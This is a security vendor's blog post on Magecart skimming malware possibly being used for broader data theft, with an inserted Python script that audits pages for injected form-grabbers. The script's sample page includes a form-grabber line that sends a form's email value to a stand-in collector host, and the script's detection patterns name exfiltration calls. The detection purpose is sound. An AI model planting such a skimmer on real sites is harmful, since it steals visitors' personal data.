Masquerading as Card-Skimmers: Are Attackers Doing More with Magecart?


While Magecart is well known as malware that hacking groups use to inject card-skimming scripts into e-commerce platforms, Prevailion researchers have detected many Magecart compromises that suggest the malicious actors are not actually going after credit card data.

According to public data breach records, the credit card information held by organizations from British Airways to NutriBullet, Tupperware, easyJet and Macy’s has been targeted in different card-skimming campaigns. In July 2019, attackers leveraged a vulnerability in the e-commerce software platform Magento, which left more than 960 online retailers compromised in a single digital skimming campaign.

Earlier this year, card-skimming groups began attacking industry verticals, going after the education sector. Parents and students found themselves victims of Magecart actors who exploited Blue Bear Software, “an administration and e-commerce platform for K-12 schools and other educational institutions,” according to Threatpost.

Beware the Three-Headed Dog

In large part, Magecart has been seen as a threat to online retailers, but this recent shift in targets suggests that the group’s objectives could be evolving. The card-skimming script has been used to steal credit card information during the checkout process by masquerading as payment forms, but the malicious script can capture any submitted information, which suggests it is likely being deployed within organizations for other purposes.

Recently, Twilio, a cloud communications company, suffered a breach that initially, “resembled a Magecart-style attack that skims websites for users’ financial data,” Cyber Scoop reported. Though Twilio, “cleaned up the code hours later, and said there was no sign the attackers had accessed customer data,” the larger concern is that the attackers had access to the code.

Once an organization is compromised through any attack vector, adversaries can linger undetected. When those actors are not financially motivated–which is often the case for nation state hackers–they are after more sensitive data. Of greater concern is that they are patient enough to take the time to find it. A network porous enough to be infiltrated, and to have data exfiltrated from it, is all too often unaware of the communication being sent from the inside out to the open web.

Speculation and the Reality of Human Risk

Recently, Prevailion’s cyberintelligence was able to identify Magecart malware in the World Health Organization’s network. When a global organization such as WHO collects and stores that much sensitive data, it is a target for malicious actors around the globe. The reality is, few users are visiting the WHO and making credit card purchases, which leads us to believe that this form-grabbing malware (able to capture any data entered into an online form) is being leveraged for more nefarious attacks. Though commodity malware is often underappreciated for its potential as a tool for APT groups, Prevailion’s Apex Platform tracks many other instances where it has indeed been deployed by APTs.
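The two points above (an injected script that captures any submitted form data, and a site that loads script it did not intend to) translate into checks a site owner can run over their own pages. As an added example, not code from the original post or from Prevailion, this Python audit flags script tags loaded from hosts outside an assumed allowlist, scripts served without Subresource Integrity, and inline scripts that both read form fields and send data off-site; the host names, allowlist and sample page are constructed for the example.

```python
import re
from html.parser import HTMLParser

# Hosts this site legitimately loads scripts from (assumed allowlist, example values).
ALLOWED_SCRIPT_HOSTS = {"(same-origin)", "cdn.example-shop.test"}
# Traits of a form-grabber: it reads submitted field values AND ships them off-site.
HOOKS = re.compile(r"addEventListener\(\s*['\"](?:submit|keyup|change)['\"]|onsubmit|\.value\b")
EXFIL = re.compile(r"\bfetch\(|XMLHttpRequest|sendBeacon|new Image\(|\.src\s*=")

class ScriptAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings, self._inline = [], None   # _inline buffers an inline script body
    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src") is None:                 # inline script: inspect its body at the end tag
            self._inline = []
            return
        m = re.match(r"^(?:https?:)?//([^/]+)", a["src"])
        host = m.group(1) if m else "(same-origin)"
        if host not in ALLOWED_SCRIPT_HOSTS:
            self.findings.append(f"script from unexpected host: {host}")
        elif not a.get("integrity"):             # no SRI: the file can change without the page noticing
            self.findings.append(f"script without SRI integrity: {a['src']}")

    def handle_data(self, data):
        if self._inline is not None:
            self._inline.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._inline is not None:
            body = "".join(self._inline)
            if HOOKS.search(body) and EXFIL.search(body):
                self.findings.append("inline script reads form fields and sends data off-site")
            self._inline = None

def audit_page(html):
    auditor = ScriptAuditor()       # returns human-readable findings for one page's HTML
    auditor.feed(html)
    return auditor.findings

# Constructed sample page: a trusted script with SRI, a same-origin one without it, a third-party script, and an injected inline handler that forwards a contact-form field to another host.
SAMPLE_HTML = """<html><body>
<script src="https://cdn.example-shop.test/app.js" integrity="sha384-PLACEHOLDER"></script>
<script src="/js/legacy.js"></script>
<script src="https://static-analytics.test/t.js"></script>
<form id="contact"><input name="email"><input name="phone"></form>
<script>document.getElementById('contact').addEventListener('submit', function (e) {
  fetch('https://collector.test/c?v=' + encodeURIComponent(e.target.email.value)); });</script>
</body></html>"""
```

Running the audit over a site's rendered pages on a schedule, and diffing the findings against a known-good baseline, turns the "unexpected script" condition into an alert rather than a post-breach discovery.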

Prevailion’s CEO Karim Hijazi explained to Fox News, “This type of infection within the WHO network could be used to hack other organizations who visit the site — or any partners/registrants who are using the site to fill out forms and submit information or make requests.”

Breached organizations continue to make headlines because they rely too much on security tools that don’t have visibility into real threats. The risk from human error is real and has an enormous impact on the business and its victims, and nation state adversaries are highly motivated. 


Copyright 2021 Prevailion, Inc. All rights reserved.    
